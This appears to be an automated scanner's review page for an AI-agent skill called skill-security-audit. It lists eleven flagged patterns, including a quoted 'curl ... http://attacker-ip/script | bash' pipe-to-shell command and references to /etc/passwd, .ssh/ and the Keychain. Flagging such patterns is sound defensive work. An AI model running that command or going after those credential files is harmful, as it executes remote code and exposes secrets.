Caveat verdict
skill-security-audit
skill-security-check
A comprehensive security audit workflow that runs a local Python scanner and optionally fetches skills from ClawHub for analysis; all operations are transparent and serve the stated security auditing purpose.
⚠ Flagged for review — coarse, uncorroborated signal, not a confirmed exploit. Review the config yourself before installing.
Automated static analysis — not a human review. Caveat flags capabilities, not confirmed intent, and can produce false positives. Disagree with this verdict? Use Dispute below.
Findings (11)
Pipe to bash — executes piped content as shell commands
references/threat_knowledge_base.md · prose · downgraded · | bash
Pipe-to-shell pattern (curl | sh) — supply chain attack vector
references/threat_knowledge_base.md · prose · downgraded · curl -fsSL http://attacker-ip/script | bash
Pipe-to-shell pattern (wget | sh)
references/threat_knowledge_base.md · prose · downgraded · wget | sh
Pipe to sh — executes piped content as shell commands
references/threat_knowledge_base.md · prose · downgraded · | sh
Accesses sensitive system files
references/threat_knowledge_base.md · prose · downgraded · /etc/passwd
Accesses system credential store
SKILL.md · prose · downgraded · Keychain
References sudo — requests elevated privileges
references/threat_knowledge_base.md · prose · downgraded · sudo
Accesses .ssh directory
references/threat_knowledge_base.md · prose · downgraded · .ssh/
Base64 encoding/decoding
SKILL.md · prose · downgraded · Base64-encode
Python urllib.request — network access
scripts/scan_skill.py · prose · downgraded · urllib.request
Python shutil file operation — copies/moves/deletes files
scripts/scan_skill.py · prose · downgraded · shutil.rmtree(
Why the tier is capped
Execution sink present in raw bytes (Hard Floor: class A/F). Final tier capped at Caution — cannot be lifted by any downgrade, example-payload opt-in, or allowlist.
Permissions & capabilities
No declared permissions — minimal attack surface.
Is this flag fair?
Thanks — recorded.